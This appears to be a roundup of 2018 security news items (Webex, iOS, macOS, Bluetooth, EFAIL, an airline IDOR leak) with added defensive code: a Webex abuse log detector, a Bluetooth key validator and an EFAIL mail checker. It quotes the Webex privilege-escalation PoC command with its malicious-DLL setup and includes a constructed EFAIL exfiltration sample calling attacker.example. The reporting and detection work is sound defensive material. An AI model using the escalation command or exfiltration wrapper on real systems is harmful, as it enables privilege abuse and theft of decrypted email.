Vulnerability Found in Cisco Webex Meetings

By: Kacy Zurkus

A security researcher has discovered an elevation-of-privilege vulnerability in the update service of the Cisco Webex Meetings application. The update service fails to properly validate user-supplied parameters, according to SecureAuth.

The vulnerability was discovered by Marcos Accossatto of SecureAuth’s exploit writers team, and the release of today’s vulnerability advisory was a coordinated effort between SecureAuth and Cisco. Reportedly used by millions of people each month, the video conferencing product’s flaw (CVE-2018-15442) allows code execution in Cisco Webex Meetings v33.6.2.16 and likely affects older versions as well, though those were not checked.

With a common weakness enumeration (CWE-78) classified as OS command injection, the vulnerability could allow an unprivileged local attacker to run arbitrary commands with system user privileges by invoking the update service command with a crafted argument, according to the advisory.

In the privilege escalation proof of concept (PoC), the researcher wrote: “The vulnerability can be exploited by copying the ptUpdate.exe binary to a local attacker-controlled folder. Also, a malicious dll must be placed in the same folder, named wbxtrace.dll. To gain privileges, the attacker must start the service with the command line: sc start webexservice install software-update 1 ‘attacker-controlled-path’ (if the parameter 1 doesn’t work, then 2 should be used).”

While Cisco had fixed this vulnerability last month, Accossatto was reportedly able to bypass that fix using DLL hijacking. Cisco has now released a new patch for Webex Meetings and updated its previous security notice.
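The detection angle on this advisory, as an added example that is not from the advisory or from Cisco: the abuse pattern is the update service being started with a path argument outside the install directory, and ptUpdate.exe then running from that path. The log records below are constructed, the field layout is simplified from what a Windows process-creation event carries, and the install root is an assumption.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample process-creation records, not logs from the advisory.
# Each record is "user|image path|command line", the fields a Windows 4688-style
# event carries. The update-service command line is the one quoted in the article.
SAMPLE_EVENTS = [
    r"CORP\alice|C:\Windows\System32\sc.exe|sc start webexservice install software-update 1 C:\Users\alice\Downloads\upd",
    r"NT AUTHORITY\SYSTEM|C:\Users\alice\Downloads\upd\ptUpdate.exe|ptUpdate.exe",
    r"NT AUTHORITY\SYSTEM|C:\Program Files\Webex\ptUpdate.exe|ptUpdate.exe",
    r"CORP\bob|C:\Windows\System32\sc.exe|sc query webexservice",
]

# Assumed install root; adjust to where Webex is actually installed on your hosts.
TRUSTED_ROOT = PureWindowsPath(r"c:\program files\webex")

# Matches the service start command from the PoC and captures its path argument.
SC_START = re.compile(
    r"sc(?:\.exe)?\s+start\s+webexservice\s+install\s+software-update\s+\d+\s+(.+)$",
    re.I,
)

def under_trusted_root(path):
    """True if path lies inside the Webex install directory (case-insensitive).
    PureWindowsPath does not resolve '..'; feed it a resolved path in production."""
    p = PureWindowsPath(path.strip('"').lower())
    try:
        p.relative_to(TRUSTED_ROOT)
        return True
    except ValueError:
        return False

def analyse(event):
    """Return a finding string for a suspicious record, or None."""
    user, image, cmdline = event.split("|", 2)
    m = SC_START.search(cmdline)
    if m and not under_trusted_root(m.group(1)):
        return f"update service started with non-install path by {user}"
    if PureWindowsPath(image).name.lower() == "ptupdate.exe" and not under_trusted_root(image):
        return f"ptUpdate.exe running outside install directory as {user}"
    return None

def findings(events=SAMPLE_EVENTS):
    """All (record, finding) pairs for the given records."""
    return [(e, r) for e in events if (r := analyse(e)) is not None]

if __name__ == "__main__":
    for record, finding in findings():
        print(finding, "<-", record)
```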

More: https://www.infosecurity-magazine.com/news/vulnerability

Expert demonstrated how to access contacts and photos from a locked iPhone XS

By: Pierluigi Paganini

Expert discovered a passcode bypass vulnerability in Apple’s new iOS version 12 that could be exploited to access photos and contacts on a locked iPhone XS.

The Apple enthusiast and “office clerk” Jose Rodriguez has discovered a passcode bypass vulnerability in Apple’s new iOS version 12 that could be exploited by an attacker (with physical access to the iPhone) to access photos and contacts on a locked iPhone XS and other devices.

The hack works on the latest iOS 12 beta and iOS 12 operating systems, as demonstrated by Rodriguez in a couple of videos he published on YouTube (Videosdebarraquito).

The passcode bypass vulnerability affects a number of other iPhone models including the latest model iPhone XS.

An attacker can access the images on the devices by editing a contact and changing the image associated with a specific caller.

Apple has addressed the issue allowing images to be viewed via contacts, but Rodriguez devised a new method to circumvent the mitigations implemented by Apple.

The attack abuses VoiceOver, the accessibility feature on iPhone; for this reason, the vulnerable device needs to have Siri enabled and Face ID either turned off or physically covered.

A step-by-step guide for Rodriguez’s attack was published by the website Gadget Hacks.

More: https://securityaffairs.co/wordpress/76700/hacking/iphone-xs-passcode-hack.html


Critical MacOS Mojave vulnerability bypasses system security

By: Michael Archambault

With the launch of a new version of macOS from Apple typically comes a culmination of new features, better performance, and enhanced security. Unfortunately, the previous statement might not necessarily be true, as security researcher Patrick Wardle, co-founder of Digita Security, has discovered that MacOS Mojave includes a severe security flaw; the bug is currently present on all machines running the latest version of macOS and allows unauthorized access to a user’s private data.

Wardle announced his discovery on Twitter, showcasing that he could easily bypass macOS Mojave’s built-in privacy protections. Due to the flaw, an unauthorized application could circumvent the system’s security and gain access to potentially sensitive information. With the Twitter post, Wardle also included a one-minute Vimeo video showing the hack in progress.

The short video begins with Wardle attempting to access a user’s protected address book and receiving a message that states the operation is not permitted. After accessing and running his bypass program, breakMojave, Wardle is then able to locate the user’s address book, circumvent the machine’s privacy access controls, and copy the address book’s contents to his desktop — no permissions needed.

Wardle is an experienced security researcher who has worked at NASA and the National Security Agency in his past; he notes that one of his current passions is finding MacOS security flaws before others have the chance. While it is unlikely Wardle will release the app as a malicious tool, he does want to spread knowledge of its existence so that Apple addresses the issue in a timely fashion.

More: https://www.digitaltrends.com/computing/macos-mojave-vulnerability


ex-NSA Hacker Discloses macOS High Sierra Zero-Day Vulnerability

By: Mohit Kumar

Your Mac computer running Apple’s latest High Sierra operating system can be hacked by tweaking just two lines of code, a researcher demonstrated at the Def Con security conference on Sunday.

Patrick Wardle, an ex-NSA hacker and now Chief Research Officer of Digita Security, uncovered a critical zero-day vulnerability in the macOS operating system that could allow a malicious application installed in the targeted system to virtually “click” objects without any user interaction or consent.

To show how far this can go, Wardle explains: “Via a single click, countless security mechanisms may be completely bypassed. Run untrusted app? Click…allowed. Authorize keychain access? Click…allowed. Load 3rd-party kernel extension? Click…allowed. Authorize outgoing network connection? click…allowed.”

Wardle described his research into “synthetic” interactions with a user interface (UI) as “The Mouse is Mightier than the Sword,” showcasing an attack that’s capable of ‘synthetic clicks’—programmatic and invisible mouse clicks that are generated by a software program rather than a human.

macOS itself offers synthetic clicks as an accessibility feature so that disabled people can interact with the system interface in non-traditional ways, but Apple has put some limitations in place to block malware from abusing these programmed clicks.

More: https://thehackernews.com/2018/08/macos-mouse-click-hack.html

Bluetooth Vulnerability Allows Traffic Monitoring, Manipulation

By: Eduard Kovacs

A high severity vulnerability affecting some Bluetooth implementations can allow an attacker in physical proximity of two targeted devices to monitor and manipulate the traffic they exchange. Some of the impacted vendors have already released patches.

The flaw, discovered by researchers at the Israel Institute of Technology and tracked as CVE-2018-5383, is related to the Secure Simple Pairing and LE Secure Connections features.

According to the Bluetooth Special Interest Group (SIG), whose members maintain and improve the technology, Bluetooth specifications recommend that devices supporting the two features validate the public key received during the pairing process. However, this is not a requirement and some vendors’ Bluetooth products do not perform public key validation.

An unauthenticated attacker who is in Bluetooth range of the targeted devices during the pairing process can launch a man-in-the-middle (MitM) attack and obtain the encryption key, which allows them to intercept traffic and forge or inject device messages.

“The attacking device would need to intercept the public key exchange by blocking each transmission, sending an acknowledgement to the sending device, and then injecting the malicious packet to the receiving device within a narrow time window. If only one device had the vulnerability, the attack would not be successful,” the Bluetooth SIG explained.

Additional technical details about the vulnerability and attack method were made public on Monday by CERT/CC.

The Bluetooth SIG says it has now updated specifications to require products to validate public keys. The organization has also added testing for this vulnerability to its Bluetooth Qualification Process, which all products that use Bluetooth must complete.
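The check the updated specification now requires, as an added example that is not from the article or from the Bluetooth SIG: Secure Simple Pairing and LE Secure Connections use ECDH on the P-256 curve, and a stack that skips validating the peer's public key will happily run ECDH on an attacker-chosen off-curve point, which is what CVE-2018-5383 comes down to. The P-256 constants are the standard ones; the Pairing Public Key PDU layout (1-byte code 0x0C, then 32-byte X and Y, little-endian) is stated here as an assumption.

```python
# Added example, not from the article or the Bluetooth SIG: full validation of
# the P-256 public key a peer sends during Secure Simple Pairing / LE Secure
# Connections. CVE-2018-5383 exists because some stacks skipped this check and
# fed an attacker-chosen off-curve point into ECDH. P-256 domain parameters:
P  = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff
A  = P - 3
B  = 0x5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b
GX = 0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296
GY = 0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5

def is_on_curve(x, y):
    """The curve equation y^2 = x^3 + a*x + b (mod p) must hold."""
    return (y * y - (x * x * x + A * x + B)) % P == 0

def validate_peer_public_key(x, y):
    """Full public-key validation for P-256. The cofactor is 1, so an affine
    point that is on the curve is in the prime-order group."""
    if not (0 <= x < P and 0 <= y < P):
        return False  # coordinates must be field elements
    if not is_on_curve(x, y):
        return False  # off-curve point: the CVE-2018-5383 case
    return True

def parse_pairing_public_key(pdu):
    """Split an SMP Pairing Public Key PDU into (x, y).
    Assumed layout: 1-byte code 0x0C, 32-byte X, 32-byte Y, little-endian."""
    if len(pdu) != 65 or pdu[0] != 0x0C:
        raise ValueError("not a Pairing Public Key PDU")
    return int.from_bytes(pdu[1:33], "little"), int.from_bytes(pdu[33:65], "little")

def build_pdu(x, y):
    """Inverse of parse_pairing_public_key, used to construct test input."""
    return bytes([0x0C]) + x.to_bytes(32, "little") + y.to_bytes(32, "little")

def accept_pairing_public_key(pdu):
    """What a conforming stack does before any ECDH: parse, validate, abort on failure."""
    x, y = parse_pairing_public_key(pdu)
    if not validate_peer_public_key(x, y):
        raise ValueError("peer public key failed validation: abort pairing")
    return x, y

def pairing_key_is_valid(pdu):
    """Boolean wrapper around accept_pairing_public_key."""
    try:
        accept_pairing_public_key(pdu)
        return True
    except ValueError:
        return False

if __name__ == "__main__":
    good = build_pdu(GX, GY)
    tampered = bytearray(good)
    tampered[40] ^= 0x01  # constructed: one flipped bit of Y moves the point off the curve
    print("genuine key accepted:", pairing_key_is_valid(good))
    print("off-curve key accepted:", pairing_key_is_valid(bytes(tampered)))
```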

More: https://www.securityweek.com/bluetooth-vulnerability-allows-traffic-monitoring-manipulation

Russia’s national vulnerability database is incomplete, and a cover for software snooping

By: Bradley Barth

The government organization running Russia’s national vulnerability database (NVD) is far less comprehensive than its American counterpart, omitting many critical bugs while focusing heavily on flaws that appear to be specifically relevant to Russian state information systems, according to new research from Recorded Future.

The Russian database, known as the BDU, is administered by the Federal Service for Technical and Export Control of Russia (FSTEC), a national military counterintelligence agency. According to Recorded Future, since 2014 FSTEC has published only about 10 percent of the 107,901 total bugs announced by the American NVD, which is operated by the U.S. Commerce Department’s National Institute of Standards and Technology (NIST).

In a blog post issued today, Recorded Future concludes that the Russian database exists not so much to provide a public service, but rather to establish a minimum set of security guidelines for Russian officials tasked with securing government information systems.

At the same time, having an official vulnerability database also gives Russia a seemingly legitimate cover for demanding that foreign software and security companies submit their products to FSTEC and related agencies for inspection of their source code, Recorded Future continues. But in reality, this is just a thin veneer through which Russia disguises its efforts to gather intel on foreign software, the researchers assert.

“FSTEC is a military organization and is publishing ‘just enough’ content to be credible as a national vulnerability database. The Russian government needs vulnerability research as a baseline for FSTEC’s other technical control responsibilities, such as requiring reviews of foreign software,” write report authors and researchers Priscilla Moriuchi, director of strategic threat development, and Dr. Bill Ladd, chief data scientist.

In an interview with SC Media, Moriuchi added that the BDU database is “virtually useless,” with “almost nothing in this that you can’t find in another database that is… more comprehensive.” And yet, it is “just enough legitimate content” to provide plausible deniability regarding “the real mission of the organizations.”

Recorded Future notes that a disproportionate number of BDU’s published bugs are flaws known to be commonly exploited by Russian APT groups. Indeed, the report says that FSTEC has listed about 60 percent of all vulnerabilities used by the Russian military. The researchers believe that this could mean Russian military officials are taking measures to ensure that the same exploits aren’t similarly employed against their own government’s information systems.

More: https://www.scmagazine.com/report-russias-national-vulnerability-database-is-incomplete-and-a-cover-for-software-snooping/article/781039/

Travel Information Leaked at Thomas Cook Airlines

By: Kacy Zurkus

A bug finder recently discovered that Thomas Cook Airlines had a security vulnerability for years, making it possible for hackers to systematically download hundreds of thousands of passenger flight details and personal data going back as far as 2013.

The issue, rated a medium to high severity level, leaked personal and travel information but is reportedly now fixed, according to a 9 July blog post by Roy Solberg. After booking his vacation, Solberg reportedly received an email from Thomas Cook Airlines with a suspicious link to airshoppen.com.

“I never downloaded a lot of data as I don’t want anyone to question my motives, but I do like to get an idea of the scope of the data leak, so I did a few tests to see if I could see how many bookings this was affecting,” Solberg wrote. In his tests, Solberg found Ving bookings from as far back as 2013, with the most recent one from 2019.

Using only a booking number, it was possible to retrieve all names on the travel booking along with the email address of the person registering the booking. Also included in the data was departure and arrival dates with airport and flight number information. After nearly two weeks of attempting to disclose the vulnerability, Solberg reportedly received little more than frustrating exchanges before never hearing from Thomas Cook Airlines again.

Three days after he went to the press, the vulnerability was reportedly fixed. This vulnerability, known as an Insecure Direct Object Reference (IDOR) is not only a commonly encountered problem on poorly designed web applications, but it’s also easy for an attacker to exploit. The issue raises concerns for both privacy and phishing attacks.

“We take any breach of our customer data extremely seriously. After being alerted to this unauthorized access to our online duty free shopping website in Norway, we closed the loophole and took responsible actions in line with the law,” a Thomas Cook spokesperson wrote in an email.

“Based upon the evidence we have, and the limited volume and nature of the data that was accessed, our assessment is that this was not an incident which is required to be reported to the authorities. For the same reasons we have not contacted the customers affected.”

More: https://www.infosecurity-magazine.com/news/travel-information-leaked-at/

Mobile App Threats Continue to Grow

By: Curtis Franklin Jr

Criminals looking to profit from corporate resources and information keep going after mobile devices, two new reports confirm.

Security threats aimed at mobile devices are evolving and shifting – and show no sign of going away. Those are the key results found in a pair of just-released reports on mobile security.

More specifically, the reports look at the security of third-party mobile applications and the effectiveness of carrier-based protection. The picture that emerges is one of risk that varies across industries but is never truly low, as well as the importance of trying to stop the actions of malicious apps as high in the network chain as possible.

In its study of third-party app risk, BitSight researchers found that vulnerable apps are common across all industries, with the vulnerabilities including data leakage, privilege abuse, unencrypted personally identifiable information, and credential theft. The differences are in the proportion of vulnerabilities that make up the total picture of each industry.

For example, BitSight’s research shows that finance had the highest rate (34%) of broken SSL configurations, while 32% of business services and education apps failed at encrypting user data. But in no industry is there a single, simple vulnerability. As Immunity researcher Lurene Grenier said at the recent Talos Threat Summit, “There are probably 10 full iPhone [exploit] chains at any given time. And that’s the most secure calling platform.”

In a speech at Interop ITX in May, Mike Murray, vice president of security intelligence at Lookout, pointed out why criminals are so interested in mobile malware. “The phone is no longer a phone. It’s an electronic device that has access to every part of our digital lives,” he said. “Unfortunately, we still think of it and protect it like it’s a Motorola flip-phone.”

A second report, Telco Security Trends, Q2 2018, conducted by Allot, looks at malware traffic from four communications service providers (CSPs) across Europe and Israel. It found that the CSPs were stopping an average of two pieces of malware per device per day.

More: https://www.darkreading.com/vulnerabilities—threats/mobile-app-threats-continue-to-grow/d/d-id/1332052

Email No Longer a Secure Method of Communication After Critical Flaw Discovered in PGP

By: Matt Novak

If you use PGP or S/MIME for email encryption you should immediately disable it in your email client. Researchers have discovered a critical vulnerability they’re calling EFAIL that exposes the encrypted emails in plaintext, even for messages sent in the past.

“Email is no longer a secure communication medium,” Sebastian Schinzel, a professor of computer security at Germany’s Münster University of Applied Sciences, told the German news outlet Süddeutsche Zeitung.

The vulnerability was first reported by the Electronic Frontier Foundation (EFF) in the early hours of Monday morning, and details were released prematurely just before 6am ET today after Süddeutsche Zeitung broke a news embargo. The group of European researchers is warning people to stop using PGP entirely and says that “there are currently no reliable fixes for the vulnerability.”

From the researchers:

The EFAIL attacks exploit vulnerabilities in the OpenPGP and S/MIME standards to reveal the plaintext of encrypted emails. In a nutshell, EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs. To create these exfiltration channels, the attacker first needs access to the encrypted emails, for example, by eavesdropping on network traffic, compromising email accounts, email servers, backup systems or client computers. The emails could even have been collected years ago.

The attacker changes an encrypted email in a particular way and sends this changed encrypted email to the victim. The victim’s email client decrypts the email and loads any external content, thus exfiltrating the plaintext to the attacker.
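What a mail client can check before it decrypts and renders, as an added example that is not from the researchers or from any mail client: the message shape described above places an encrypted part next to HTML fragments in one multipart/mixed container, and the exfiltration channel is a remote resource reference inside HTML. The sample message is constructed and its ciphertext is a placeholder.

```python
import re
from email import message_from_string

# Constructed sample, not from the EFAIL paper: a PGP/MIME encrypted part wrapped
# between two HTML fragments, the "direct exfiltration" shape the researchers
# describe. The ciphertext is a placeholder, not real OpenPGP data.
SAMPLE = """\
Content-Type: multipart/mixed; boundary="outer"

--outer
Content-Type: text/html

<img src="http://attacker.example/
--outer
Content-Type: multipart/encrypted; protocol="application/pgp-encrypted"; boundary="enc"

--enc
Content-Type: application/pgp-encrypted

Version: 1
--enc
Content-Type: application/octet-stream

-----BEGIN PGP MESSAGE-----
PLACEHOLDER-CIPHERTEXT-NOT-REAL
-----END PGP MESSAGE-----
--enc--
--outer
Content-Type: text/html

">
--outer--
"""

ENCRYPTED_TYPES = {"multipart/encrypted", "application/pkcs7-mime"}
# Remote loads inside HTML (img/link src or href, CSS url()) are the exfiltration channel.
REMOTE_REF = re.compile(r'(?:src|href)\s*=\s*["\']?\s*https?://|url\(\s*["\']?https?://', re.I)

def efail_risk(raw):
    """Return the reasons a client should refuse to decrypt-and-render this message."""
    msg = message_from_string(raw)
    reasons = []
    for part in msg.walk():
        if not part.is_multipart() or part.get_content_type() in ENCRYPTED_TYPES:
            continue
        types = [child.get_content_type() for child in part.get_payload()]
        if ENCRYPTED_TYPES & set(types) and "text/html" in types:
            reasons.append("encrypted part has HTML siblings (direct exfiltration shape)")
    if any(p.get_content_type() == "text/html" and REMOTE_REF.search(p.get_payload())
           for p in msg.walk()):
        reasons.append("HTML part references remote content (exfiltration channel)")
    return reasons
```

A client that gets a non-empty list back should decrypt only on explicit user request and render the result with remote content blocked.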

More: https://gizmodo-com.cdn.ampproject.org/c/s/gizmodo.com/email-no-longer-a-secure-method-of-communication-after-1826002682/amp